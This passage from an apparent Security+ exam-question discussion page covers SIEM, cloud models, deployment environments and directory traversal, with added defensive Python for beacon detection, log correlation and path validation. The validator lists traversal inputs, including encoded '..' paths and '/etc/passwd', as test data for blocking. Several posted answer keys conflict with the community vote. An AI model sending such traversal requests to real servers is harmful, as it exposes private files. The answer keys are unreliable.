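Added example, not from the original page. Log lines are constructed in a
simplified firewall format (timestamp, action, src, dst, dport) using the
documentation address ranges. A beacon reconnects to the same destination at a
nearly fixed interval, so its inter-arrival times have very low jitter compared
with a user's irregular browsing to the same site.
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed log: 10.0.5.23 talks to 203.0.113.10 about once a minute (beacon)
# and to 198.51.100.7 at irregular intervals (interactive use). 10.0.5.24's
# attempts were denied, so no channel was formed.
FIREWALL_LOG = """\
2023-01-16T08:00:00 ALLOW 10.0.5.23 203.0.113.10 443
2023-01-16T08:00:05 ALLOW 10.0.5.23 198.51.100.7 443
2023-01-16T08:00:20 ALLOW 10.0.5.23 198.51.100.7 443
2023-01-16T08:00:25 ALLOW 10.0.5.23 198.51.100.7 443
2023-01-16T08:01:01 ALLOW 10.0.5.23 203.0.113.10 443
2023-01-16T08:02:00 ALLOW 10.0.5.23 203.0.113.10 443
2023-01-16T08:03:02 ALLOW 10.0.5.23 203.0.113.10 443
2023-01-16T08:03:59 ALLOW 10.0.5.23 203.0.113.10 443
2023-01-16T08:05:01 ALLOW 10.0.5.23 203.0.113.10 443
2023-01-16T08:05:10 ALLOW 10.0.5.23 198.51.100.7 443
2023-01-16T08:06:40 ALLOW 10.0.5.23 198.51.100.7 443
2023-01-16T08:15:00 ALLOW 10.0.5.23 198.51.100.7 443
2023-01-16T08:16:00 DENY  10.0.5.24 203.0.113.10 443
2023-01-16T08:17:00 DENY  10.0.5.24 203.0.113.10 443
""".splitlines()


def parse(lines):
    """Group ALLOWed connection timestamps by (src, dst, dport)."""
    flows = defaultdict(list)
    for line in lines:
        ts, action, src, dst, dport = line.split()
        if action != "ALLOW":
            continue  # blocked attempts never formed a channel; hunt those separately
        flows[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return flows


def beacon_score(timestamps):
    """Mean interval and coefficient of variation (jitter / period) for one flow."""
    ts = sorted(timestamps)
    deltas = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(deltas)
    cv = statistics.pstdev(deltas) / mean if mean else float("inf")
    return mean, cv


def find_beacons(lines, min_hits=5, max_cv=0.2):
    """Flows with at least min_hits connections whose interval jitter is below max_cv."""
    hits = []
    for (src, dst, dport), stamps in parse(lines).items():
        if len(stamps) < min_hits:
            continue
        period, cv = beacon_score(stamps)
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "dport": dport, "hits": len(stamps),
                         "period_s": period, "jitter_cv": cv})
    return sorted(hits, key=lambda h: h["jitter_cv"])


if __name__ == "__main__":
    for hit in find_beacons(FIREWALL_LOG):
        print(f"{hit['src']} -> {hit['dst']}:{hit['dport']}  "
              f"{hit['hits']} hits, period {hit['period_s']:.1f}s, jitter cv {hit['jitter_cv']:.3f}")
```

The same measurement works on DNS query logs (group by client and queried name) and on proxy logs; the point is that periodicity, not destination reputation, is what surfaces an unknown C2 endpoint.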

carpathia (2 months, 4 weeks ago)
Selected Answer: B
Command and Control - the adversary is able to maintain presence, as mentioned in the question.
upvoted 1 times

babyzilla (3 months ago)
A is not a feasible answer because the actor is already on the network. If you don't know the steps, visit
https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack/

D is not feasible because there is no mention of exploitation in the question.

Both B and C are feasible, but because of the lack of information in the question, B would be the best choice. Since the actor is or can communicate outbound, there is a clear Command and Control (C2) issue at hand. The next step would be Actions on Objectives, which would be to carry out their malicious intent (e.g. ransomware, DDoS). However, we can only assume B, because the actor could still be awaiting further instructions using their C2 posture. I hope this helps. Somewhat of a tricky question, but I think everyone is on the same page with this one. Thanks & good luck!
upvoted 2 times

Jossie_C (3 months ago)
Outbound traffic not restricted means the adversary can communicate with the victim system out-of-network
upvoted 1 times

Fitzd (4 months, 3 weeks ago)
Just asking, was he already doing C2? That would make the next move:
Weaponization
Delivery
Exploitation
Installation
Command and Control
Actions on Objectives
upvoted 1 times

BM9904 (4 months, 3 weeks ago)
Selected Answer: D
Keyword "still", therefore the attacker still has access. Actions on Objective: once the attacker/intruder gains persistent access, they finally take action to fulfil their purpose, such as encryption for ransom, data exfiltration or even data destruction.
upvoted 2 times

BM9904 (4 months, 3 weeks ago)
Disregard, should be B not C
upvoted 2 times

Question #55 Topic 1

A recent security breach exploited software vulnerabilities in the firewall and within the network management solution. Which of the following will
MOST likely be used to identify when the breach occurred through each device?

A. SIEM correlation dashboards

B. Firewall syslog event logs

C. Network management solution login audit logs

D. Bandwidth monitors and interface sensors

Correct Answer: A

Community vote distribution: A (100%)

varun0 (Highly Voted, 5 months ago)
Selected Answer: A
SIEM could tell when the breach occurred in firewall AND in network management solution
upvoted 21 times

stoneface (5 months ago)
I concur
upvoted 2 times
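What the SIEM has to do before it can date the breach per device, as an added example (not code from the original page or from any SIEM product): normalise the firewall's BSD-syslog lines (no year, local time) and the management solution's JSON audit records (UTC) into one timeline, then take the earliest event per device that involves the attacker's source address. Both log samples, the firewall time zone (UTC-5), the year and the attacker address are constructed assumptions. Reading either device's log on its own, or sorting the raw strings, would put the firewall events after the management-solution login and misdate the breach.

```python
"""Correlating two devices' logs to date a breach per device, the SIEM way.

Added example, not from the original page. Both log samples are constructed:
the firewall emits BSD-syslog lines (no year, local time) and the network
management solution writes JSON audit records with UTC timestamps. The firewall
time zone and the year are assumptions the correlation has to supply.
"""
import json
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

FW_TZ = timezone(timedelta(hours=-5))  # assumed local zone of the firewall
LOG_YEAR = 2023                         # BSD syslog omits the year

# Constructed firewall syslog (local time, no year).
FIREWALL_SYSLOG = """\
Jan 16 02:17:09 fw01 fwd: admin login ok user=svc-backup src=198.51.100.7
Jan 16 02:19:44 fw01 fwd: policy change rule=allow-any-out by=svc-backup src=198.51.100.7
Jan 16 02:20:01 fw01 fwd: session 10.0.5.23:51344 -> 203.0.113.10:443 allowed
""".splitlines()

# Constructed NMS audit log (JSON lines, UTC).
NMS_AUDIT = """\
{"ts": "2023-01-16T06:58:30Z", "host": "nms01", "event": "login", "user": "netops", "src": "10.0.1.5"}
{"ts": "2023-01-16T07:31:12Z", "host": "nms01", "event": "login", "user": "svc-backup", "src": "198.51.100.7"}
{"ts": "2023-01-16T07:32:50Z", "host": "nms01", "event": "user_created", "user": "svc-backup", "target": "support2", "src": "198.51.100.7"}
""".splitlines()

SYSLOG_RE = re.compile(r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<msg>.*)$")


@dataclass(frozen=True)
class Event:
    ts: datetime            # always UTC after normalisation
    device: str
    src: Optional[str]      # source address named in the record, if any
    message: str


def parse_firewall(line, year=LOG_YEAR, tz=FW_TZ):
    """BSD syslog: supply the missing year, attach the device's zone, convert to UTC."""
    m = SYSLOG_RE.match(line)
    if not m:
        raise ValueError(f"not a syslog line: {line!r}")
    local = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year, tzinfo=tz)
    src = re.search(r"src=(\S+)", m["msg"])
    return Event(local.astimezone(timezone.utc), m["host"], src.group(1) if src else None, m["msg"])


def parse_nms(line):
    """JSON audit record with an RFC 3339 'Z' timestamp."""
    rec = json.loads(line)
    ts = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00")).astimezone(timezone.utc)
    msg = " ".join(f"{k}={v}" for k, v in rec.items() if k not in ("ts", "host"))
    return Event(ts, rec["host"], rec.get("src"), msg)


def build_timeline(fw_lines=FIREWALL_SYSLOG, nms_lines=NMS_AUDIT):
    events = [parse_firewall(l) for l in fw_lines] + [parse_nms(l) for l in nms_lines]
    return sorted(events, key=lambda e: e.ts)


def first_sighting(timeline, attacker_ip):
    """Earliest event per device involving the attacker's address: when each device was breached."""
    first = {}
    for e in timeline:
        if e.src == attacker_ip and e.device not in first:
            first[e.device] = e.ts
    return first


if __name__ == "__main__":
    timeline = build_timeline()
    for e in timeline:
        print(e.ts.isoformat(), e.device, e.message)
    for device, ts in first_sighting(timeline, "198.51.100.7").items():
        print(f"{device}: first attacker activity at {ts.isoformat()}")
```

Per-device log review (options B and C in the question) gives each device's own clock and format; only after normalisation can the analyst say the firewall was reached first and the management solution about fourteen minutes later from the same address, which is the correlation a SIEM dashboard is there to show.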

Question #56 Topic 1

Which of the following is the FIRST environment in which proper, secure coding should be practiced?

A. Stage

B. Development

C. Production

D. Test

Correct Answer: A

Community vote distribution: B (83%), other

varun0 (Highly Voted, 5 months ago)
Selected Answer: B
Development

The developer has to start writing secure code from the beginning. It will then be tested, staged and finally go to production.
upvoted 17 times

comeragh (Highly Voted, 4 months, 1 week ago)
Selected Answer: B
Development, Testing, Staging, Production
upvoted 5 times

DALLASCOWBOYS (Most Recent, 6 days, 7 hours ago)
B. Development, which is the first step; secure coding practices should be used in all phases.
upvoted 1 times

nul8212 (1 month, 2 weeks ago)
Selected Answer: A
The question needs to ask what the first step of the environment is. It asks for the first step before the software is ready to get sold.
Staging: ensure quality assurance before we roll it out to production.
upvoted 1 times

Sandon (2 weeks, 3 days ago)
Wrong, it does not ask for the first step before the software is ready to get sold.
upvoted 2 times

Nirmalabhi (2 months ago)
Selected Answer: A
Development is the first stage of the environments; it's pretty straightforward.
upvoted 1 times

bengy78 (2 months, 3 weeks ago)
It's B; the first stage is development. Per CompTIA CertMaster: "DevSecOps extends the boundary to security specialists and personnel, reflecting the principle that security is a primary consideration at every stage of software development and deployment."
upvoted 1 times

Abisoye (2 months, 3 weeks ago)
A staging environment (stage) is a nearly exact replica of a production environment for software testing. Staging environments are made to test
codes, builds, and updates to ensure quality under a production-like environment before application deployment.
upvoted 2 times

lordguck (3 months, 1 week ago)
The question is about coding, so it's B.
upvoted 1 times

BigV (3 months, 2 weeks ago)
Definitely B.
https://techbeacon.com/app-dev-testing/security-usability-go-hand-hand-5-tips-get-development-mix-right
upvoted 1 times

Tomtom11 (4 months ago)
Selected Answer: D
Testing of the application throughout the software development lifecycle can determine the actual security risk profile of a system. (From the CompTIA book)
upvoted 1 times

Rasyidul (4 months, 1 week ago)
Selected Answer: A
Staging

I believe the Test environment will still identify security flaws in the source code. This means that the first environment for properly secured source code would be Staging, where the environment is the same as the Production environment.

Please correct me if I'm wrong.


upvoted 2 times

alayeluwa (3 months, 3 weeks ago)
Yup, happy to tell you that you are very wrong, but it's ok ;)

It's B; Development comes first.


upvoted 4 times

RonWonkers (4 months, 3 weeks ago)
Selected Answer: B
Development
upvoted 1 times

carpathia (4 months, 3 weeks ago)
Selected Answer: B
Development is the 1st environment
upvoted 1 times

FQ (4 months, 3 weeks ago)
Selected Answer: B
Development is the first environment.
upvoted 1 times

Question #57 Topic 1

A cloud service provider has created an environment where customers can connect existing local networks to the cloud for additional computing
resources and block internal HR applications from reaching the cloud. Which of the following cloud models is being used?

A. Public

B. Community

C. Hybrid

D. Private

Correct Answer: C

Community vote distribution: C (71%), D (29%)

varun0 (Highly Voted, 5 months ago)
Selected Answer: C
Hybrid cloud, since the internal network and cloud computing are combined
upvoted 13 times

ronniehaang (Most Recent, 4 days, 18 hours ago)
Selected Answer: C
C. Hybrid. A hybrid cloud model combines a private cloud with a public cloud and is used by organizations that need to keep some data and
applications in-house for privacy, security, or regulatory reasons, but also want to take advantage of the scalability and cost-effectiveness of
public cloud services for other workloads. In this scenario, the customer has connected their existing local network to the cloud for additional
computing resources and has taken steps to block certain internal applications from reaching the cloud, which indicates that the hybrid cloud
model is being used.
upvoted 1 times

DALLASCOWBOYS (6 days, 7 hours ago)
C. A hybrid cloud is a mixture of private and public cloud components. For example, an org can host a private cloud for exclusive internal use but distribute some resources on a public cloud for business partners, customers, etc.
upvoted 1 times

sanlibo (2 weeks, 2 days ago)
Selected Answer: C
Hybrid cloud refers to a combination of at least 2 computing environments that share information with one another and run a uniform series of
applications for a business or enterprise. Those environments may include: At least 1 private cloud and at least 1 public cloud. 2 or more private
clouds. 2 or more public clouds.
upvoted 2 times

ZDW (3 weeks ago)
I see people keep saying that a "public cloud" isn't mentioned, but is that not what a "Cloud Service Provider" is? A Cloud Service Provider (public cloud) has created an environment for customers, which sounds like either public or hybrid (only because it does not expressly say there is a private cloud at all).
upvoted 1 times

viksap (1 month, 2 weeks ago)
Selected Answer: D
Hybrid is a combination of Public and Private, but the question doesn't have that mentioned, so I'm going with D.
upvoted 1 times

sanlibo (1 week, 6 days ago)
Private is the internal HR
upvoted 1 times

jhfdkjshfkjdsho (1 month, 2 weeks ago)
Selected Answer: C
Hybrid
upvoted 2 times

rhocale (1 month, 3 weeks ago)
Yes, hybrid seems right to me: both public use (customers) and private (HR).
upvoted 1 times

okay123 (2 months, 2 weeks ago)
Selected Answer: C
See, because they mentioned internal HR + external customers = Hybrid
upvoted 4 times
Ayzaza (2 months, 3 weeks ago)
Selected Answer: D
The SP supplies a private cloud service for their customers!
upvoted 1 times

babyzilla (3 months ago)
Selected Answer: D
Since there is no mention of public usage (which is required for a hybrid solution), only private would make sense to me. But, of course, it's CompTIA and I could be wrong lol
upvoted 2 times

blacktaliban (3 months ago)
Yeah, I'm going with C... Customer is public and HR is private
upvoted 2 times

lordguck (3 months ago)
D: C is false, as it's not mentioned that the HR apps use cloud functionality in any way.
upvoted 1 times

B2100 (3 months, 1 week ago)
Selected Answer: D
https://azure.microsoft.com/en-us/resources/cloud-computing-dictionary/what-are-private-public-hybrid-clouds/#overview. "A hybrid cloud is a type of cloud computing that combines on-premises infrastructure—or a private cloud—with a public cloud. Hybrid clouds allow data and apps to move between the two environments." In that case it is not a hybrid cloud.
upvoted 1 times

comeragh (4 months, 1 week ago)
Selected Answer: D
Private Cloud. "connect existing local networks to the cloud"

Private cloud is cloud computing that is dedicated solely to your organization. Hybrid cloud is any environment that uses both public and private
clouds.
upvoted 2 times

Gravoc (4 months, 2 weeks ago)
Private cloud = A cloud infrastructure setup and intended specifically for one client/customer.

Community Cloud = A cloud infrastructure shared by organizations within the same industry. "Communitizes" the costs of cloud computing to
reduce the cost burden per entity. Such as banking organizations going in together on a community cloud platform designed specifically for the
banking industries cloud computing needs.

Hybrid = A mixed model where computing, storage, and applications are both on-premise and in the cloud, as well as utilizing more than one
cloud service. Most organizations are a hybrid cloud.

Public = Any cloud service offered to the general public. Ranging from Google Drive, Microsoft Azure, Amazon Web Services, and Microsoft
OneNote.
upvoted 3 times

mark9999 4 months, 3 weeks ago
Hybrid cloud refers to a mixed computing, storage, and services environment made up of on-premises infrastructure, private cloud services, and
a public cloud—such as Amazon Web Services (AWS) or Microsoft Azure—with orchestration among the various platforms. Answer is C a Hybrid.
upvoted 1 times

Question #58 Topic 1

An organization has developed an application that needs a patch to fix a critical vulnerability. In which of the following environments should the patch be deployed LAST?

A. Test

B. Staging

C. Development

D. Production

Correct Answer: C

Community vote distribution: D (93%) 7%

varun0 (Highly Voted) 5 months ago
Selected Answer: D
LAST place to deploy the patch is production
upvoted 16 times

stoneface (Highly Voted) 5 months, 1 week ago
Selected Answer: D
Production should be the last place where to apply patches as you have already tested properly
upvoted 9 times

ronniehaang (Most Recent) 4 days, 18 hours ago
Selected Answer: D
The patch should be deployed LAST in the Production environment. Deploying the patch in the Production environment should be done with
care, as it is the live environment where the application is running and serving users. The patch should have been thoroughly tested in a Test
environment, and any necessary adjustments should have been made in the Development or Staging environment. This is to ensure the patch
doesn't cause any unexpected issues in the Production environment, where any issue can have the greatest impact.
upvoted 1 times

DALLASCOWBOYS 6 days, 6 hours ago
D. Production, as you want to evaluate the patch to ensure that it doesn't impact the live production environment.
upvoted 1 times

xxxdolorxxx 1 week, 6 days ago
Selected Answer: D
D. Production is always the final place you make changes.
upvoted 2 times

xxxdolorxxx 2 weeks, 2 days ago
Selected Answer: D
My vote goes to D.
upvoted 2 times

jhfdkjshfkjdsho 1 month, 2 weeks ago
Selected Answer: D
Production
upvoted 1 times

EubertT 1 month, 3 weeks ago
Please refer to this link and understand the sequence instead of guessing:
https://www.flagship.io/test-environment/
When deploying a new release to production, rather than immediately deploying to all users, the release can be deployed in phases to a segment
of your users first to see how it performs to catch and fix any additional bugs before deploying to the rest of your users.
upvoted 2 times

learnNcurve 2 months ago
Selected Answer: B
I would say B, because the staging phase you are able to simulate an environment as close to the real one to ensure the product works correctly.
If any issues were found they would be patched and retested.
I do not think it is D since that is when the product is entering the live stage.
Then again how could it be C?

upvoted 3 times
carpathia 2 months, 2 weeks ago
These are not questions to test your knowledge, but rather the twisted logic in the question (more like puzzles)... It's ridiculous.
upvoted 4 times

BigV 3 months, 2 weeks ago
What's a staging environment?
Your staging environment is a setup that replicates your production environment. In short, it's an identical replica of your product. You shouldn't
be able to find any differences between your staging environment and your final product. But unlike your final product, it's not for the public
domain.

Think of it as a safe space where you can throw everything together and find out how it works. It’s the ultimate Quality Assurance test because
it’s as close to the real thing as you can get.
upvoted 2 times

[Removed] 3 months, 3 weeks ago
Selected Answer: D
Answer: D. Production
The production environment is the live system. Software,
patches, and other changes that have been tested and
approved move to production.

Reference: CompTIA® Security+® Study Guide, Exam SY0-601, Eighth Edition, by Mike Chapple and David Seidl
upvoted 3 times

4342421222 4 months ago
Answer is C.
All systems need to be patched, before being pushed to production.
upvoted 2 times

comeragh 4 months, 1 week ago
Selected Answer: D
Development, Testing, Staging, Production
upvoted 2 times

db97 4 months, 1 week ago
Staging first and finally in production. D is correct.
upvoted 2 times

msyusa 4 months, 2 weeks ago
Staging environments are made to test codes, builds, and updates to ensure quality under a production-like environment before application
deployment. The staging environment requires a copy of the same configurations of hardware, servers, databases, and caches.
upvoted 2 times

Halaa 4 months, 2 weeks ago
Agree with you
upvoted 1 times

Gravoc 4 months, 2 weeks ago
Production environments are end of the line. That's the live server/service environment. You NEVER want to implement anything into production
without first having thoroughly tested it in a staging virtualization environment. If it's a coding patch, as in the organization's developers
themselves are writing code to modify the production code repository, then it starts with development first. If it's a downloaded vulnerability
patch from a 3rd party like Microsoft, you skip development and jump right into staging.
upvoted 4 times

Question #59 Topic 1

An organization is building backup server rooms in geographically diverse locations. The Chief Information Security Officer implemented a
requirement on the project that states the new hardware cannot be susceptible to the same vulnerabilities in the existing server room. Which of
the following should the systems engineer consider?

A. Purchasing hardware from different vendors

B. Migrating workloads to public cloud infrastructure

C. Implementing a robust patch management solution

D. Designing new detective security controls

Correct Answer: B

Community vote distribution: A (89%) 11%

brewoz404sd 2 days, 21 hours ago
The answer is C, not A at all! Different hw does nothing to mitigate failure or vulnerabilities. Migrating some infrastructure / workloads to cloud
mitigates the SAME failure / vulnerabilities as the previous dc. C!
upvoted 1 times

sanlibo 2 weeks, 2 days ago
Selected Answer: A
"new hardware cannot be susceptible to the same vulnerabilities in the existing server room"
upvoted 1 times

jhfdkjshfkjdsho 1 month, 2 weeks ago
Selected Answer: B
Different vendors can use similar chips. It says "geographically diverse locations" That is why the cloud is the best solution.
upvoted 2 times

blacktaliban 3 months ago
Different vendors, different hardware, different vulnerabilities.
upvoted 3 times

Libraboy 3 months, 2 weeks ago
Selected Answer: A
"....that states the new hardware cannot be susceptible to the same vulnerabilities..."
emphasis on the new hardware!
upvoted 2 times

_bishalk__ 4 months, 1 week ago
Vendor diversity. Ans is A.
upvoted 1 times

Bob455 4 months, 1 week ago
How is this A? Vulnerable servers are due to misconfigurations and weak security controls; shouldn't it be D? That has nothing to do with who you
purchase from.
upvoted 1 times

Strykar 4 months, 2 weeks ago
Selected Answer: A
It's A. Who's answering these questions?
upvoted 4 times

Demilitarized_zone 3 months, 1 week ago
Help me ask, please... I feel the owners of this platform should get professionals to answer these questions. Many of the answers are clearly
wrong.
upvoted 2 times

Ggonza3 2 months, 4 weeks ago
I think that they're not allowed to outright post the correct answers, hence why this website is community based.
upvoted 2 times

Gravoc 4 months, 2 weeks ago
Don't let this one trip you up. A seems to be too easy of an answer, but it's A. Part of the reason it tripped me up is anytime I learned about
vendor diversity, it was always in the context of anti-malware, SIEM, NIDS, etc. Never dawned on me that vendor diversity also applies to
physical hardware, but it makes sense. Vendor diversity is a part of the swiss cheese model, or defense-in-depth. Having your production server
and your backup server running identical configurations means that there's two perfectly aligned holes in the swiss cheese model, meaning the
integrity of the backup server cannot be trusted in the event of an attack that damages or shuts down the production server. Different hardware is
a defense layer that gives the defenders a buffer time to get their operation back in order, and defend against potentially inbound attacks on the
backup server.
upvoted 4 times
redsidemanc2 4 months, 4 weeks ago
Selected Answer: A
different vendors, different products, different vulns on the devices. if you have all cisco equipment the vulns on the switches are the same.
upvoted 3 times

usam2021 5 months ago
Answer A promotes vendor diversity.
upvoted 3 times

Wiggie 5 months ago
Selected Answer: A
The answer is A
upvoted 1 times

yorkwu 5 months ago
Selected Answer: A
I agree with A
upvoted 1 times

cozzmo 5 months ago
Selected Answer: A
What's wrong with A?
upvoted 4 times

Joe1984 5 months ago
Agreed, A makes more sense.
upvoted 1 times

varun0 5 months ago
I agree with A
upvoted 2 times

Question #60 Topic 1

A security analyst is working on a project to implement a solution that monitors network communications and provides alerts when abnormal
behavior is detected.
Which of the following is the security analyst MOST likely implementing?

A. Vulnerability scans

B. User behavior analysis

C. Security orchestration, automation, and response

D. Threat hunting

Correct Answer: B

Community vote distribution: B (65%) C (35%)

Sepu (Highly Voted) 4 months, 3 weeks ago
Selected Answer: B
B.
SOAR will react to the alert.
upvoted 14 times

deeden 2 months ago
You mean C. SOAR ?
upvoted 3 times

Nirmalabhi (Highly Voted) 2 months ago
Selected Answer: B
Not 100% sure, but I will go with B, User Behavior Analysis.

Reason: As per CompTIA objectives, User Behavior Analysis comes under SIEM. As the question asks what's most likely the solution being
implemented, User Behavior Analysis seems to be the direct answer. SOAR simply means you are adding automation and servers handle
the security tasks automatically and take action. Happy to discuss. Some of the questions are meant to confuse, so I'll stick to the most direct connection in
this case. B
upvoted 11 times

tebirkishaw (Most Recent) 3 days, 14 hours ago
Selected Answer: B
There is no automation of tasks going on, just an alert. Nothing is being fixed. Has to be B
upvoted 2 times

DALLASCOWBOYS 6 days, 6 hours ago
C. SOAR.
upvoted 1 times

P0wned 1 month ago
Selected Answer: C
The security analyst is most likely implementing security orchestration, automation, and response (SOAR). SOAR solutions are designed to
monitor network communications and provide alerts when abnormal behavior is detected. SOAR solutions typically use artificial intelligence and
machine learning to analyze network traffic and identify potential security threats. They can also be configured to take automated responses,
such as blocking malicious traffic or quarantining suspicious files, to help protect the network.

Vulnerability scans, user behavior analysis, and threat hunting are all important security practices, but they are not specifically related to
monitoring network communications and providing alerts when abnormal behavior is detected.
upvoted 1 times

LaoX 1 month ago
Selected Answer: B
Seems to me like something for IDS. The IDS is a particular procedure that is used to identify intruders by analyzing user behavior in the system
after the user logged in. It identifies user suspicious behavior as an intrusion or normal behavior but the SOAR helps coordinate, execute and
automate tasks between various people and tools all within a single platform. Totally different purpose.
upvoted 1 times

its_melly 1 month, 3 weeks ago
Selected Answer: B
"UEBA is an extension of SIEM where, in addition to observing suspicious network behavior, they also trigger alerts when unusual entity or user
behavior is observed"
upvoted 2 times
tek7ila 2 months ago
Selected Answer: B
I stand corrected. After some reading I will go with B.

"Behavioral-based detection means that the engine is trained to recognize baseline
"normal" traffic or events. Anything that deviates from this baseline (outside a defined
level of tolerance) generates an incident. The idea is that the software will be able to
identify zero day attacks, insider threats, and other malicious activity for which there is
single signature." <---it fits perfectly
upvoted 4 times

tek7ila 2 months, 1 week ago
I would go with C. It only says something about abnormal behaviour; it was never said it has to be user behaviour. So logically speaking SOAR should be
the right answer.
upvoted 3 times

carpathia 2 months, 2 weeks ago
Selected Answer: C
UBA is a SIEM feature, not a standalone product (CompTIA books). SOAR looks more like it. UBA looks at who is launching apps, who
accessed what, abnormal patterns of users (opening certain files, etc.) proving malicious intent, etc.
upvoted 5 times

FMMIR 2 months, 2 weeks ago
Selected Answer: B
SOAR (Security Orchestration, Automation, and Response) is an independent product. SOAR allows a company to respond to events. For
example, if ES detects an authorized access, SOAR might be configured to tell the network to block that access. Since SOAR is a separate
product it does not require Splunk Enterprise, but the two can work together.

UBA (User Behavior Analytics) is another independent product. It monitors activity on a network and alerts when it notices "unusual" activity. An
activity is considered "unusual" if it breaks the pattern UBA has noticed in the past (using machine learning). It, too, can work with Splunk
Enterprise, but does not require it.
upvoted 3 times

Biyo 2 months, 2 weeks ago
User and entity behavior analytics (UEBA)
– Detect insider threats
– Identify targeted attacks
– Catches what the SIEM and DLP systems might miss
• Sentiment analysis
– Public discourse correlates to real-world behavior
– If they hate you, they hack you
– Social media can be a barometer
SOAR
• Security orchestration, automation, and response
– Automate routine, tedious, and time intensive activities
• Orchestration
– Connect many different tools together
– Firewalls, account management, email filters
• Automation - Handle security tasks automatically
• Response - Make changes immediately
.... SOAR
upvoted 1 times

okay123 2 months, 3 weeks ago
Selected Answer: B
B: User and entity behavior analytics (UEBA), also known as user behavior analytics (UBA), is the process of gathering insight into the network
events that users generate every day. Once collected and analyzed, it can be used to detect the use of compromised credentials, lateral
movement, and other malicious behavior-

https://www.rapid7.com/fundamentals/user-behavior-analytics/#:~:text=User%20and%20entity%20behavior%20analytics%20(UEBA)%2C%20also%20known%20as,movement%2C%20and%20other%20malicious%20behavior.
upvoted 2 times

nobnarb 2 months, 3 weeks ago
Selected Answer: B
User behavior analytics sometimes called user entity behavior analytics (UEBA), is a category of software that helps security teams identify and
respond to insider threats that might otherwise be overlooked.
upvoted 3 times

carpathia 2 months, 4 weeks ago
Selected Answer: C
UBA has only got to do with the end-user; I don't see that in the question, even though "behaviour" is mentioned. It must be SOAR.
upvoted 3 times

babyzilla 3 months ago
Selected Answer: B
I'm going with B. UBA is not as intensive of a project compared to implementing SOAR. The scope of the project seems to be more simple. I
think SOAR would be overthinking this scenario.
upvoted 3 times

blacktaliban 3 months ago
Selected Answer: B
Yea B
upvoted 3 times

Question #61 Topic 1

Data exfiltration analysis indicates that an attacker managed to download system configuration notes from a web server. The web-server logs
have been deleted, but analysts have determined that the system configuration notes were stored in the database administrator's folder on the
web server. Which of the following attacks explains what occurred? (Choose two.)

A. Pass-the-hash

B. Directory traversal

C. SQL injection

D. Privilege escalation

E. Cross-site scripting

F. Request forgery

Correct Answer: BD

Community vote distribution: BD (90%) 5%

carpathia (Highly Voted) 2 months, 2 weeks ago
Selected Answer: BD
"admin's folder" - priv escalation, + dir traversal. "database" is thrown in as a decoy for the SQL answer.
upvoted 6 times

j0n45 (Highly Voted) 4 months, 3 weeks ago
Selected Answer: BD
Directory traversal and Privilege escalation.
upvoted 5 times

rodwave (Most Recent) 2 months, 3 weeks ago
Selected Answer: BD
Answer: B. Directory traversal & D. Privilege escalation

Directory traversal is a type of HTTP exploit in which a hacker uses the software on a web server to access data in a directory other than the
server's root directory. If the attempt is successful, the threat actor can view restricted files or execute commands on the server.

Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to
gain elevated access to resources that are normally protected from an application or user.
upvoted 4 times
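The containment check that defeats the directory traversal rodwave describes, as an added example written for this page (not ExamTopics content or any commenter's code). The document root `/srv/webroot`, the `dba/config_notes.txt` target and the sample request strings are constructed assumptions; the vulnerable `naive_resolve` is shown beside the hardened `safe_resolve`.

```python
"""Path-resolution check against directory traversal (Question #61).

Added example; not from ExamTopics or any commenter. The document root and
request strings are constructed for the demo.
"""
import os
from urllib.parse import unquote


class TraversalAttempt(ValueError):
    """Raised when a requested path would resolve outside the document root."""


def naive_resolve(root, requested):
    """The vulnerable pattern: join the client-supplied path onto the root.

    normpath() collapses '..' segments, so '../dba/config_notes.txt' silently
    lands one level above the root, which is the exposure the question describes.
    """
    return os.path.normpath(os.path.join(root, requested))


def safe_resolve(root, requested):
    """Resolve `requested` under `root` or raise TraversalAttempt.

    Canonicalises both sides with realpath() (follows symlinks, collapses '..')
    and then requires the canonical root to be a path prefix of the result.
    """
    decoded = unquote(requested)  # one percent-decode, as the front end would do
    if "\x00" in decoded:
        raise TraversalAttempt("NUL byte in path")
    if "\\" in decoded:
        raise TraversalAttempt("backslash separator not accepted")
    if os.path.isabs(decoded):
        raise TraversalAttempt("absolute path not accepted")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded))
    # commonpath() is the reliable containment test; a plain startswith() would
    # accept '/srv/webroot-old/...' as being inside '/srv/webroot'.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise TraversalAttempt(f"{requested!r} escapes the document root")
    return candidate


def classify_requests(root, requests):
    """Return {request: 'allowed' | 'blocked: <reason>'} for a batch of paths."""
    verdicts = {}
    for req in requests:
        try:
            safe_resolve(root, req)
            verdicts[req] = "allowed"
        except TraversalAttempt as exc:
            verdicts[req] = f"blocked: {exc}"
    return verdicts


# Constructed sample requests: one legitimate, the rest traversal variants.
SAMPLE_REQUESTS = [
    "reports/q1.txt",
    "../dba/config_notes.txt",
    "%2e%2e/%2e%2e/dba/config_notes.txt",
    "..\\..\\dba\\config_notes.txt",
    "/etc/passwd",
    "reports/../../dba/config_notes.txt",
]

if __name__ == "__main__":
    root = "/srv/webroot"  # constructed document root
    print("naive:", naive_resolve(root, "../dba/config_notes.txt"))
    for req, verdict in classify_requests(root, SAMPLE_REQUESTS).items():
        print(f"{req:40} {verdict}")
```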

G4ct756 3 months, 2 weeks ago
Selected Answer: CD
C & D:
- C, the admin notes are stored in "the database", which will require SQLi to interact with the DB.
- D, need privilege to clear the system logs.
upvoted 1 times

hieptran 3 weeks, 5 days ago
Read the question carefully. It clearly stated: "database administrator's folder". It has nothing to do with SQL injection.
upvoted 1 times

FT1 5 months ago
B&D
The simplest example of a directory traversal attack is when an application displays or allows the user to download a file via a URL parameter.
upvoted 4 times

Wiggie 5 months ago
Selected Answer: BC
B and C
upvoted 1 times

Wiggie 5 months ago
Correction, B and D
upvoted 2 times

varun0 5 months ago
Selected Answer: BD
B & D seem to be correct.
upvoted 3 times

